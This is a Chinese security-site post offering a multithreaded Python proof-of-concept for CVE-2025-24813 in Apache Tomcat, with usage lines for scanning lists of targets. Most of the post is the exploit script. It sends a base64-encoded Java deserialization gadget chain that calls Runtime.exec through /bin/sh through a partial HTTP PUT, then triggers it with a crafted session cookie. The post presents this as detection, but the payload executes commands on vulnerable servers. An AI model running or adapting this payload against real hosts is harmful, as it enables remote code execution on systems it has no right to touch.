Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)

020115

Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)

漏洞复现

https://mp.weixin.qq.com/s/Rkpi7aDAgPwozR7PRfxkGg

https://mp.weixin.qq.com/s/KDlABlF57DsqmMzLaMKHKQ

利用条件较为苛刻,该脚本仅针对存在漏洞的环境进行概念性验证

使用方式:

批量检测支持多线程:

python poc.py -l url.txt -t 5

单个检测:

python poc.py -u your-ip

20250313201057747-图片

POC

import argparse
import base64
import sys
import requests
from concurrent.futures import ThreadPoolExecutor

COLOR = {
    "RED": "\033[91m",
    "GREEN": "\033[92m",
    "YELLOW": "\033[93m",
    "BLUE": "\033[94m",
    "PURPLE": "\033[95m",
    "CYAN": "\033[96m",
    "RESET": "\033[0m"
}

BANNER = f"""
{COLOR['PURPLE']}
  ___  _ __   ___ | |_ ___  ___| |_ 
 / _ \| '_ \ / _ \| __/ _ \/ __| __|
| (_) | |_) | (_) | ||  __/\__ \ |_ 
 \___/| .__/ \___/ \__\___||___/\__|
      |_| {COLOR['CYAN']}Apache Tomcat RCE Detector
{COLOR['RED']}CVE-2025-24813 {COLOR['RESET']}@Author: iSee857
"""

# Payload
PAYLOAD = base64.b64decode(
    "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"
)

def print_vulnerable(target):
    print(f"\n{COLOR['RED']}[!] 目标存在漏洞: {target}")
    print(f"[+] CVE-2025-24813 Apache Tomcat 远程代码执行漏洞{COLOR['RESET']}\n")

def check_target(target):
    try:
        host, port = target.split(":")
        port = int(port)
    except:
        print(f"{COLOR['YELLOW']}[!] 无效目标格式: {target}{COLOR['RESET']}")
        return

    base_url = f"http://{host}:{port}"
    put_url = f"{base_url}/iSee857/session"
    
    try:

        put_response = requests.put(
            put_url,
            headers={
                "Host": f"{host}:{port}",
                "Content-Length": "10000",
                "Content-Range": "bytes 0-1000/1200"
            },
            data=PAYLOAD,
            verify=False,
            timeout=10
        )


        if put_response.status_code == 409:
            get_response = requests.get(
                base_url,
                headers={"Cookie": "JSESSIONID=.iSee857"},
                verify=False,
                timeout=10
            )

            if get_response.status_code == 500:
                print_vulnerable(target)
                return True

        print(f"{COLOR['GREEN']}[+] {target} 未检测到漏洞{COLOR['RESET']}")
        return False

    except requests.exceptions.RequestException as e:
        print(f"{COLOR['YELLOW']}[!] {target} 检测失败: {str(e)}{COLOR['RESET']}")
        return False
    except Exception as e:
        print(f"{COLOR['RED']}[!] {target} 发生错误: {str(e)}{COLOR['RESET']}")
        return False

def main():
    print(BANNER)
    
    parser = argparse.ArgumentParser(description='Apache Tomcat RCE检测工具')
    parser.add_argument('-u', '--url', help='单个目标 (格式: ip:port)')
    parser.add_argument('-l', '--list', help='包含多个目标的文件')
    parser.add_argument('-t', '--threads', type=int, default=5, 
                       help='并发线程数 (默认: 5)')
    args = parser.parse_args()

    targets = []
    if args.url:
        targets.append(args.url)
    elif args.list:
        try:
            with open(args.list, 'r') as f:
                targets = [line.strip() for line in f if line.strip()]
        except FileNotFoundError:
            print(f"{COLOR['RED']}[!] 文件不存在: {args.list}{COLOR['RESET']}")
            sys.exit(1)
    else:
        parser.print_help()
        sys.exit(1)

    print(f"{COLOR['CYAN']}[*] 开始检测,共 {len(targets)} 个目标...{COLOR['RESET']}")

    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        results = executor.map(check_target, targets)

    vulnerable_count = sum(1 for result in results if result)
    print(f"\n{COLOR['PURPLE']}[*] 检测完成,共发现 {vulnerable_count} 个存在漏洞的目标{COLOR['RESET']}")

if __name__ == "__main__":
    main()
© 版权声明
文章版权归作者所有,转载请标明出处。
THE END
漏洞情报
# CVE-2025-24813
喜欢就支持一下吧
点赞15 分享
李白的头像-李白你好永久会员
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】-李白你好
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】
李白你好VIP社区-网络安全情报攻防站介绍【请耐心看完】
2个月前 1750
Vshell-listens-李白你好
Vshell-listens
Vshell-listens
9个月前 1170
证书列表【包下证系列】-李白你好
证书列表【包下证系列】
证书列表【包下证系列】
2个月前 1062
2025渗透攻防相关工具集合-李白你好
2025渗透攻防相关工具集合
2025渗透攻防相关工具集合
3个月前 754
红队武器库漏洞利用工具合集整理-李白你好
红队武器库漏洞利用工具合集整理
红队武器库漏洞利用工具合集整理
8个月前 620
【涉我威胁预警】河南某教育科技有限公司涉嫌数据泄露-李白你好
【涉我威胁预警】河南某教育科技有限公司涉嫌数据泄露
【涉我威胁预警】河南某教育科技有限公司涉嫌数据泄露
1个月前 573
相关推荐
全量漏洞文库新增漏洞-2025.03.18-李白你好
全量漏洞文库新增漏洞-2025.03.18
全量漏洞文库新增漏洞-2025.03.18
1个月前 202
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)-李白你好
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)
Apache Tomcat 远程代码执行漏洞批量检测脚本(CVE-2025-24813)
1个月前 201
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞-李白你好
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞
安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞
1个月前 182
Ollama未授权访问漏洞(CNVD-2025-04094)-李白你好
Ollama未授权访问漏洞(CNVD-2025-04094)
Ollama未授权访问漏洞(CNVD-2025-04094)
1个月前 175
Guns后台任意文件上传漏洞-李白你好
Guns后台任意文件上传漏洞
Guns后台任意文件上传漏洞
3个月前 151
全量漏洞文库新增漏洞-2025.02.27-李白你好
全量漏洞文库新增漏洞-2025.02.27
全量漏洞文库新增漏洞-2025.02.27
2个月前 136
全量漏洞文库新增漏洞-2025.03.09-李白你好
全量漏洞文库新增漏洞-2025.03.09
全量漏洞文库新增漏洞-2025.03.09
1个月前 134
Vite开发服务器任意文件读取漏洞(CVE-2025-30208)-李白你好
Vite开发服务器任意文件读取漏洞(CVE-2025-30208)
Vite开发服务器任意文件读取漏洞(CVE-2025-30208)
1个月前 127
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    暂无评论内容